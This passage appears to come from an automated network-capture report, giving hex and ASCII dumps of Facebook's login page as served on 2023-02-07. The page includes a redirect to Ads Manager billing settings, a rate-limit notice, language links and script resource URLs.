                                                                                    Data Ascii: ],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/se
                                                                                    2023-02-07 18:46:36 UTC1535INData Raw: 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 63 6f 74 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65
                                                                                    Data Ascii: NameConfig",[],{"seed":"2cot"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/le
                                                                                    2023-02-07 18:46:36 UTC1536INData Raw: 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 73 65 74 74 69 6e 67 73 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 61 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c 2f 73 6f 66 74 6e 75 64 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65
                                                                                    Data Ascii: "\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/ze
                                                                                    2023-02-07 18:46:36 UTC1537INData Raw: 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 5c 2f 73 75 62 6d 69 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 6c 6f 67 69 6e 5c 2f 22
                                                                                    Data Ascii: "\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/"
                                                                                    2023-02-07 18:46:36 UTC1539INData Raw: 53 32 49 6e 6e 4e 47 49 36 61 74 47 5a 78 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 43 70 70 74 6a 59 35 48 34 73 61 4a 4f 69 72 58 34 72 78 42 6d 70 30 5f 75 68 4d 49 6f 46 32 30 58 56 55 4c 35 78 31 4b 50 31 79 49 58 34 56 6e 37 65 49 6f 53 34 74 49 65 71 47 7a 32 79 44 78 69 6e 62 4b 6e 4e 55 42 56 53 32 49 6e 6e 4e 47 49 36 61 74 47 5a 78 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 22 41 61 33 43 70 70 74 6a 59 35 48 34 73 61 4a 4f 69 72 58 34 72 78 42 6d 70 30 5f 75 68 4d 49 6f 46 32 30 58 56
                                                                                    Data Ascii: S2InnNGI6atGZxc"]},-1],["cr:696703",[],{"__rc":[null,"Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerImpl","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XV
                                                                                    2023-02-07 18:46:36 UTC1540INData Raw: 74 47 5a 78 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 33 43 70 70 74 6a 59 35 48 34 73 61 4a 4f 69 72 58 34 72 78 42 6d 70 30 5f 75 68 4d 49 6f 46 32 30 58 56 55 4c 35 78 31 4b 50 31 79 49 58 34 56 6e 37 65 49 6f 53 34 74 49 65 71 47 7a 32 79 44 78 69 6e 62 4b 6e 4e 55 42 56 53 32 49 6e 6e 4e 47 49 36 61 74 47 5a 78 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 2c 22 41 61 30 65 31 71 71 75 6b 2d 45 54 74 70 7a 48 74 48 4e 79 58 53 4f 6d 64 43 7a 59 63 4a 47 4c 61 4b 76
                                                                                    Data Ascii: tGZxc"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:729414",["VisualCompletion"],{"__rc":["VisualCompletion","Aa0e1qquk-ETtpzHtHNyXSOmdCzYcJGLaKv
                                                                                    2023-02-07 18:46:36 UTC1542INData Raw: 56 76 79 66 48 46 34 37 43 54 68 69 57 41 70 45 57 32 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 7a 70 42 58 4f 33 71 37 73 53 46 56 56 52 66 59 62 2d 79 50 54 36 54 39 71 64 59 53 74 36 6d 4b 57 4b 4e 35 78 62 41 58 57 57 4d 6b 4c 58 72 32 48 31 6a 75 6d 78 49 5a 5a 6f 31 4f 69 43 63 4c 5a 37 66 64 44 6e 59 77 63 43 37 65 6b 61 34 71 73 6d 63 7a 76 76 4d 64 59 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44 6f 6d 61 69 6e 22 5d 2c 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 22 5d 2c 5b 22 50 72 69 6d 65 72 22 5d 2c 5b 22 42 69 67 50 69 70 65 22 5d 2c 5b 22 42 6f 6f
                                                                                    Data Ascii: VvyfHF47CThiWApEW2"]},-1],["cr:1984081",[],{"__rc":[null,"Aa1zpBXO3q7sSFVVRfYb-yPT6T9qdYSt6mKWKN5xbAXWWMkLXr2H1jumxIZZo1OiCcLZ7fdDnYwcC7eka4qsmczvvMdY"]},-1]],"require":[["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"],["Primer"],["BigPipe"],["Boo
                                                                                    2023-02-07 18:46:36 UTC1543INData Raw: 6f 67 69 6e 2f 3f 6c 6f 67 69 6e 5f 61 74 74 65 6d 70 74 3d 31 26 61 6d 70 3b 6c 77 76 3d 31 30 30 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 6e 6f 76 61 6c 69 64 61 74 65 3d 22 31 22 20 6f 6e 73 75 62 6d 69 74 3d 22 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6a 61 7a 6f 65 73 74 22 20 76 61 6c 75 65 3d 22 32 39 33 32 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 73 64 22 20 76 61 6c 75 65 3d 22 41 56 72 61 5a 4c 51 59 33 4c 6b 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 74 61 62 6c 65 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74
                                                                                    Data Ascii: ogin/?login_attempt=1&amp;lwv=100" method="post" novalidate="1" onsubmit=""><input type="hidden" name="jazoest" value="2932" autocomplete="off" /><input type="hidden" name="lsd" value="AVraZLQY3Lk" autocomplete="off" /><table cellspacing="0" role="present
                                                                                    2023-02-07 18:46:36 UTC1545INData Raw: 55 53 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6e 65 78 74 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 5f 73 6f 75 72 63 65 22 20 76 61 6c
                                                                                    Data Ascii: US" /><input type="hidden" autocomplete="off" name="next" value="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><input type="hidden" autocomplete="off" name="login_source" val
                                                                                    2023-02-07 18:46:36 UTC1546INData Raw: 6d 20 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 43 6f 6e 74 65 6e 74 22 3e 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 79 6f 75 20 77 65 72 65 20 6d 69 73 75 73 69 6e 67 20 74 68 69 73 20 66 65 61 74 75 72 65 20 62 79 20 67 6f 69 6e 67 20 74 6f 6f 20 66 61 73 74 2e 20 59 6f 75 e2 80 99 76 65 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 62 6c 6f 63 6b 65 64 20 66 72 6f 6d 20 75 73 69 6e 67 20 69 74 2e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 42 61 72 20 75 69 42 6f 78 47 72 61 79 20 74 6f 70 62 6f 72 64 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 66 6c 6f 61 74 20 5f 6f 68 66 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22
                                                                                    Data Ascii: m uiInterstitialContent">It looks like you were misusing this feature by going too fast. Youve been temporarily blocked from using it.</div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="
                                                                                    2023-02-07 18:46:36 UTC1548INData Raw: 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76
                                                                                    Data Ascii: n.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv
                                                                                    2023-02-07 18:46:36 UTC1549INData Raw: 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 73 71 5f 41 4c 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f
                                                                                    Data Ascii: ).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selecto
                                                                                    2023-02-07 18:46:36 UTC1551INData Raw: 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30
                                                                                    Data Ascii: t_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00
                                                                                    2023-02-07 18:46:36 UTC1552INData Raw: 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66 79 3d 22 2f 73 65 74 74 69 6e 67 73 2f 6c 61 6e 67 75 61 67 65 2f 6c 61 6e 67 75 61 67 65 2f 3f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 6c 6f 67 69 6e 2e 70 68 70 25 33 46 6e 65 78 74 25 33 44 68 74 74 70 73 25 32 35 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 35 32 46 61 64 73 25 32 35 32 46 6d 61 6e 61 67 65 72 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53
                                                                                    Data Ascii: "dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="S
                                                                                    2023-02-07 18:46:36 UTC1554INData Raw: 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 25 32 46 26 61 6d 70 3b 68 3d 41 54 30 6a 44 36 50 37 4b 6f 4e 30 52 6c 77 43 31 76 64 70 6c 7a 75 4d 6b 59 32 72 52 6c 4d 46 4b 67 5f 64 50 5a 6e 58 43 4e 77 7a 56 50 6a 33 47 38 39 70 66 51 67 4f 64 71 38 4d 69 35 70 78 64 4e 2d 34 54 30 76 6f 56 31 4d 58 6b 76 49 55 75 6e 72 31 6d 5f 71 6d 72 4f 47 6d 45 39 71 45 2d 59 5f 68 46 79 58 56 4d 71 49 35 68 77 4c 37 69 33 37 31 74 56 57 34 67 37 62 34 42 55 74 6c 70 4f 6a 73 54 4c 47 5a 6e 47 6b 51 35 75 61 76 32 4f 30 51 39 41 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74
                                                                                    Data Ascii: https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT0jD6P7KoN0RlwC1vdplzuMkY2rRlMFKg_dPZnXCNwzVPj3G89pfQgOdq8Mi5pxdN-4T0voV1MXkvIUunr1m_qmrOGmE9qE-Y_hFyXVMqI5hwL7i371tVW4g7b4BUtlpOjsTLGZnGkQ5uav2O0Q9A" title="Check out Instagram" target="_blank" rel="nofollow" dat
                                                                                    2023-02-07 18:46:36 UTC1555INData Raw: 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f
                                                                                    Data Ascii: age</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a href="/policies/cookies/
                                                                                    2023-02-07 18:46:36 UTC1557INData Raw: 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 37 34 36 33 39 37 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 34 31 36 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 72 69 34 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 35 57 6f 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c
                                                                                    Data Ascii: ":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpData":{"1746397":{"r":1,"s":1}},"gkxData":{"4166":{"result":false,"hash":"AT7yrb5QuQ92736uri4"},"3212":{"result":true,"hash":"AT7tgdobiEoC5qOA5Wo"},"1908135":{"result":false,
                                                                                    2023-02-07 18:46:36 UTC1558INData Raw: 63 66 37 63 0d 0a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6d 5c 2f 72 5c 2f 32 5a 39 67 7a 59 50 4c 33 54 57 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 34 44 78 73 6d 66 55 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 65 5c 2f 72 5c 2f 67 53 69 5f 4d 32 53 57 53 56 48 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 4b 50 4a 62 71 4a 22 3a 7b 22 74 79 70 65 22 3a 22
                                                                                    Data Ascii: cf7c"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ym\/r\/2Z9gzYPL3TW.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"4DxsmfU":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/gSi_M2SWSVH.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dKPJbqJ":{"type":"
                                                                                    2023-02-07 18:46:36 UTC1559INData Raw: 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 73 41 39 51 6d 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 72 5c 2f 77 65 34 66 45 6f 53 43 46 75 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 70 35 35 48 66 58 57 5f 5f 6d 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63
                                                                                    Data Ascii: Kz","nc":1},"6sA9Qme":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/we4fEoSCFu8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz","nc
                                                                                    2023-02-07 18:46:36 UTC1561INData Raw: 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 65 39 41 4e 7a 77 5c 2f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 50 77 4c 34 5c 2f 79 33 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4e 45 2d 55 51 5f 4b 2d 57 54 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 46 45 32 72 6d 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 